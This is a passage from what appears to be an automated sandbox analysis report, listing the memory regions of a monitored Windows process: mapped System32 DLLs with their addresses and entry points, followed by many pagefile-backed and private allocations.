"es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 723 start_va = 0x7ffb21820000 end_va = 0x7ffb218c0fff monitored = 0 entry_point = 0x7ffb21823db0 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 724 start_va = 0x7ffb218f0000 end_va = 0x7ffb21953fff monitored = 0 entry_point = 0x7ffb21905ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 725 start_va = 0x7ffb21b90000 end_va = 0x7ffb220d4fff monitored = 0 entry_point = 0x7ffb21d2a450 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 726 start_va = 0x7ffb220e0000 end_va = 0x7ffb2234efff monitored = 0 entry_point = 0x7ffb221922b0 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll") Region: id = 727 start_va = 0x7ffb22430000 end_va = 0x7ffb2247afff monitored = 0 entry_point = 0x7ffb224472b0 region_type = mapped_file name = "uianimation.dll" filename = "\\Windows\\System32\\UIAnimation.dll" (normalized: "c:\\windows\\system32\\uianimation.dll") Region: id = 728 start_va = 0x7ffb22480000 end_va = 0x7ffb22630fff monitored = 0 entry_point = 0x7ffb225161a0 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 729 start_va = 0x7ffb22650000 end_va = 0x7ffb226f1fff monitored = 0 entry_point = 0x7ffb22670a40 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 730 start_va = 0x7ffb22700000 end_va = 0x7ffb229a7fff monitored = 0 entry_point = 0x7ffb22793250 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 731 start_va = 0x7ffb229b0000 end_va = 0x7ffb229d1fff monitored = 0 entry_point = 0x7ffb229b1a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 732 start_va = 0x7ffb22a00000 end_va = 0x7ffb22abdfff monitored = 0 entry_point = 0x7ffb22a42d40 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 733 start_va = 0x7ffb22ac0000 end_va = 0x7ffb22ba2fff monitored = 0 entry_point = 0x7ffb22af7da0 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\System32\\dcomp.dll" (normalized: "c:\\windows\\system32\\dcomp.dll") Region: id = 734 start_va = 0x7ffb22ee0000 end_va = 0x7ffb22f58fff monitored = 0 entry_point = 0x7ffb22effb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 735 start_va = 0x7ffb22f60000 end_va = 0x7ffb23025fff monitored = 0 entry_point = 0x7ffb22f63ac0 region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll") Region: id = 736 start_va = 0x7ffb23030000 end_va = 0x7ffb2306ffff monitored = 0 entry_point = 0x7ffb23043750 region_type = mapped_file name = "settingmonitor.dll" filename = "\\Windows\\System32\\SettingMonitor.dll" (normalized: "c:\\windows\\system32\\settingmonitor.dll") Region: id = 737 start_va = 0x7ffb230d0000 end_va = 0x7ffb23102fff monitored = 0 entry_point = 0x7ffb230d3800 region_type = mapped_file name = "portabledevicetypes.dll" filename = "\\Windows\\System32\\PortableDeviceTypes.dll" (normalized: "c:\\windows\\system32\\portabledevicetypes.dll") Region: id = 738 start_va = 0x7ffb23110000 end_va = 0x7ffb235a2fff monitored = 0 entry_point = 0x7ffb2311f760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 739 start_va = 0x7ffb235b0000 end_va = 0x7ffb23616fff monitored = 0 entry_point = 0x7ffb235ce710 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 740 start_va = 0x7ffb23620000 end_va = 0x7ffb2366efff monitored = 0 entry_point = 0x7ffb23627ab0 region_type = mapped_file name = "inputswitch.dll" filename = "\\Windows\\System32\\InputSwitch.dll" (normalized: "c:\\windows\\system32\\inputswitch.dll") Region: id = 741 start_va = 0x7ffb23670000 end_va = 0x7ffb237f5fff monitored = 0 entry_point = 0x7ffb236bd700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 742 start_va = 0x7ffb23800000 end_va = 0x7ffb2381bfff monitored = 0 entry_point = 0x7ffb238037a0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 743 start_va = 0x7ffb23820000 end_va = 0x7ffb23854fff monitored = 0 entry_point = 0x7ffb23823cc0 region_type = mapped_file name = "wscapi.dll" filename = "\\Windows\\System32\\wscapi.dll" (normalized: "c:\\windows\\system32\\wscapi.dll") Region: id = 744 start_va = 0x7ffb23860000 end_va = 0x7ffb23872fff monitored = 0 entry_point = 0x7ffb23862760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 745 start_va = 0x7ffb23880000 end_va = 0x7ffb238a4fff monitored = 0 entry_point = 0x7ffb23882300 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 746 start_va = 0x7ffb238e0000 end_va = 0x7ffb23904fff monitored = 0 entry_point = 0x7ffb238f5220 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 747 start_va = 0x7ffb23910000 end_va = 0x7ffb2391bfff monitored = 0 entry_point = 0x7ffb23911470 region_type = mapped_file name = "dsclient.dll" filename = "\\Windows\\System32\\dsclient.dll" (normalized: "c:\\windows\\system32\\dsclient.dll") Region: id = 748 start_va = 0x7ffb23930000 end_va = 0x7ffb23944fff monitored = 0 entry_point = 0x7ffb23932850 region_type = mapped_file name = "wpdshserviceobj.dll" filename = "\\Windows\\System32\\WPDShServiceObj.dll" (normalized: "c:\\windows\\system32\\wpdshserviceobj.dll") Region: id = 749 start_va = 0x7ffb23950000 end_va = 0x7ffb2398bfff monitored = 0 entry_point = 0x7ffb239525e0 region_type = mapped_file name = "bthprops.cpl" filename = "\\Windows\\System32\\bthprops.cpl" (normalized: "c:\\windows\\system32\\bthprops.cpl") Region: id = 750 start_va = 0x7ffb23aa0000 end_va = 0x7ffb23b35fff monitored = 0 entry_point = 0x7ffb23ac5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 751 start_va = 0x7ffb23b60000 end_va = 0x7ffb23b86fff monitored = 0 entry_point = 0x7ffb23b67940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 752 start_va = 0x7ffb23b90000 end_va = 0x7ffb23c39fff monitored = 0 entry_point = 0x7ffb23bb7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 753 start_va = 0x7ffb23c40000 end_va = 0x7ffb23d3ffff monitored = 0 entry_point = 0x7ffb23c80f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 754 start_va = 0x7ffb23ee0000 end_va = 0x7ffb23f09fff monitored = 0 entry_point = 0x7ffb23ee8b90 region_type = mapped_file name = "rmclient.dll" filename = "\\Windows\\System32\\rmclient.dll" (normalized: "c:\\windows\\system32\\rmclient.dll") Region: id = 755 start_va = 0x7ffb242c0000 end_va = 0x7ffb243b3fff monitored = 0 entry_point = 0x7ffb242ca960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 756 start_va = 0x7ffb24530000 end_va = 0x7ffb2453bfff monitored = 0 entry_point = 0x7ffb245327e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 757 start_va = 0x7ffb24610000 end_va = 0x7ffb24640fff monitored = 0 entry_point = 0x7ffb24617d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 758 start_va = 0x7ffb24670000 end_va = 0x7ffb246e9fff monitored = 0 entry_point = 0x7ffb24691a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 759 start_va = 0x7ffb24770000 end_va = 0x7ffb24779fff monitored = 0 entry_point = 0x7ffb24771830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 760 start_va = 0x7ffb24880000 end_va = 0x7ffb2489efff monitored = 0 entry_point = 0x7ffb24885d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 761 start_va = 0x7ffb249f0000 end_va = 0x7ffb24a4bfff monitored = 0 entry_point = 0x7ffb24a06f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 762 start_va = 0x7ffb24aa0000 end_va = 0x7ffb24ab6fff monitored = 0 entry_point = 0x7ffb24aa79d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 763 start_va = 0x7ffb24bc0000 end_va = 0x7ffb24bcafff monitored = 0 entry_point = 0x7ffb24bc19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 764 start_va = 0x7ffb24c50000 end_va = 0x7ffb24c89fff monitored = 0 entry_point = 0x7ffb24c58d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 765 start_va = 0x7ffb24c90000 end_va = 0x7ffb24cb6fff monitored = 0 entry_point = 0x7ffb24ca0aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 766 start_va = 0x7ffb24da0000 end_va = 0x7ffb24dccfff monitored = 0 entry_point = 0x7ffb24db9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 767 start_va = 0x7ffb24f30000 end_va = 0x7ffb24f85fff monitored = 0 entry_point = 0x7ffb24f40bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 768 start_va = 0x7ffb24fb0000 end_va = 0x7ffb24fd8fff monitored = 0 entry_point = 0x7ffb24fc4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 769 start_va = 0x7ffb24fe0000 end_va = 0x7ffb25078fff monitored = 0 entry_point = 0x7ffb2500f4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 770 start_va = 0x7ffb25120000 end_va = 0x7ffb2512efff monitored = 0 entry_point = 0x7ffb25123210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 771 start_va = 0x7ffb25130000 end_va = 0x7ffb2517afff monitored = 0 entry_point = 0x7ffb251335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 772 start_va = 0x7ffb25180000 end_va = 0x7ffb25193fff monitored = 0 entry_point = 0x7ffb251852e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 773 start_va = 0x7ffb251a0000 end_va = 0x7ffb251affff monitored = 0 entry_point = 0x7ffb251a56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 774 start_va = 0x7ffb251b0000 end_va = 0x7ffb25397fff monitored = 0 entry_point = 0x7ffb251dba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 775 start_va = 0x7ffb253c0000 end_va = 0x7ffb25586fff monitored = 0 entry_point = 0x7ffb2541db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 776 start_va = 0x7ffb25640000 end_va = 0x7ffb256a9fff monitored = 0 entry_point = 0x7ffb25676d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 777 start_va = 0x7ffb256b0000 end_va = 0x7ffb25764fff monitored = 0 entry_point = 0x7ffb256f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 778 start_va = 0x7ffb25800000 end_va = 0x7ffb25842fff monitored = 0 entry_point = 0x7ffb25814b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 779 start_va = 0x7ffb25850000 end_va = 0x7ffb25e93fff monitored = 0 entry_point = 0x7ffb25a164b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 780 start_va = 0x7ffb25ea0000 end_va = 0x7ffb25ef4fff monitored = 0 entry_point = 0x7ffb25eb7970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 781 start_va = 0x7ffb25f00000 end_va = 0x7ffb26085fff monitored = 0 entry_point = 0x7ffb25f4ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 782 start_va = 0x7ffb26090000 end_va = 0x7ffb261e5fff monitored = 0 entry_point = 0x7ffb2609a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 783 start_va = 0x7ffb261f0000 end_va = 0x7ffb2622afff monitored = 0 entry_point = 0x7ffb261f12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 784 start_va = 0x7ffb26230000 end_va = 0x7ffb262dcfff monitored = 0 entry_point = 0x7ffb262481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 785 start_va = 0x7ffb262e0000 end_va = 0x7ffb26331fff monitored = 0 entry_point = 0x7ffb262ef530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 786 start_va = 0x7ffb264f0000 end_va = 0x7ffb2658cfff monitored = 0 entry_point = 0x7ffb264f78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 787 start_va = 0x7ffb26590000 end_va = 0x7ffb266abfff monitored = 0 entry_point = 0x7ffb265d02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 788 start_va = 0x7ffb266b0000 end_va = 0x7ffb26756fff monitored = 0 entry_point = 0x7ffb266bb4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 789 start_va = 0x7ffb267e0000 end_va = 0x7ffb27d3efff monitored = 0 entry_point = 0x7ffb269411f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 790 start_va = 0x7ffb27d40000 end_va = 0x7ffb27d9afff monitored = 0 entry_point = 0x7ffb27d538b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 791 start_va = 0x7ffb27e00000 end_va = 0x7ffb2807cfff monitored = 0 entry_point = 0x7ffb27ed4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 792 start_va = 0x7ffb28080000 end_va = 0x7ffb281d9fff monitored = 0 entry_point = 0x7ffb280c38e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 793 start_va = 0x7ffb281e0000 end_va = 0x7ffb28322fff monitored = 0 entry_point = 0x7ffb28208210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 794 start_va = 0x7ffb28450000 end_va = 0x7ffb284bafff monitored = 0 entry_point = 0x7ffb284690c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 795 start_va = 0x7ffb284c0000 end_va = 0x7ffb288e8fff monitored = 0 entry_point = 0x7ffb284e8740 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 796 start_va = 0x7ffb288f0000 end_va = 0x7ffb289b0fff monitored = 0 entry_point = 0x7ffb28910da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 797 start_va = 0x7ffb289c0000 end_va = 0x7ffb28a2efff monitored = 0 entry_point = 0x7ffb289e5f70 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 798 start_va = 0x7ffb28a40000 end_va = 0x7ffb28a47fff monitored = 0 entry_point = 0x7ffb28a41ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 799 start_va = 0x7ffb28a50000 end_va = 0x7ffb28af6fff monitored = 0 entry_point = 0x7ffb28a658d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 800 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 801 start_va = 0x2830000 end_va = 0x2834fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002830000" filename = "" Region: id = 804 start_va = 0x2840000 end_va = 0x2855fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002840000" filename = "" Region: id = 805 start_va = 0x101f0000 end_va = 0x1026ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000101f0000" filename = "" Region: id = 806 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 807 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 808 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 809 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 810 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 811 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 812 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 813 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 814 start_va = 0x7cf0000 end_va = 0x7d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007cf0000" filename = "" Region: id = 815 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 816 start_va = 0x10270000 end_va = 0x102effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010270000" filename = "" Region: id = 817 start_va = 0x102f0000 end_va = 0x1036ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000102f0000" filename = "" Region: id = 818 start_va = 0x4120000 end_va = 0x413ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 819 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 820 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 821 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 822 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 823 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 824 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 825 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 826 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 827 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 828 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 829 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 830 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 831 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 832 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 833 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 834 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 835 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 836 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 837 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 838 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 839 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 840 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 841 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 842 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 843 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 844 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 845 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 846 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 847 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 848 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 849 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 850 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 851 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 852 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 853 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 854 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 855 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 856 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 857 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 858 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 859 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 